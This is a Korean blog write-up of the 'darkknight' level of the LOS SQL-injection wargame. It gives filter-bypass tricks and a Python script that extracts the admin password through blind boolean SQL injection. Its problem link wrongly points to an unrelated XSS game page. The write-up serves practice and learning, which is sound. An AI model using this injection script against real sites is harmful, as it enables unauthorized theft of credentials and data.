write-up(web)/los

[LOS] darkknight

chanchand 2023. 1. 22. 02:37
반응형

문제

https://xss-game.appspot.com/level6

 

https://xss-game.appspot.com/level6

Oops! Based on your browser cookies it seems like you haven't passed the previous level of the game. Please go back to the previous level and complete the challenge.

xss-game.appspot.com

 

 

문제풀이

id가 admin인 pw를 찾아서 pw 파라미터에 넘기면 문제가 해결된다.

이전 문제와 동일하게 = 문자는 like로, substr 문자는 left/right로 대체한다.

문자열 표현은 16진수로, ascii는 ord로 대체한다.

 

 

- 파이썬 코드

import requests

cookie={'PHPSESSID':''}
url="https://los.rubiya.kr/chall/darkknight_5cfbc71e68e09f1b039a8204d1a81456.php?"

# flag_len
flag_len=0
for i in range(50):
  query="?pw=1&no=1||id like 0x61646D696E %26%26 length(pw) like {}".format(i)
  res=requests.get(url+query, cookies=cookie)
  if (res.text.find("<h2>Hello admin</h2>")!=-1):
    flag_len=i
    break

print("flag_len:{}".format(flag_len))

# flag
flag=""

for i in range(1,flag_len+1):
  for j in range(33,128):
    query="?pw=1&no=1||id like 0x61646D696E %26%26 ord(right(left(pw,{}),1)) like {}".format(i,j)
    res=requests.get(url+query, cookies=cookie)
    if (res.text.find("<h2>Hello admin</h2>")!=-1):
      flag+=chr(j)
      print(flag)
      break

print("flag:{}".format(flag))

 

반응형

'write-up(web) > los' 카테고리의 다른 글

[LOS] giant  (0) 2023.01.22
[LOS] bugbear  (0) 2023.01.22
[LOS] golem  (0) 2023.01.22
[LOS] skeleton  (0) 2023.01.22
[LOS] vampire  (0) 2023.01.22

'write-up(web)/los'의 다른글

  • 현재글[LOS] darkknight

티스토리툴바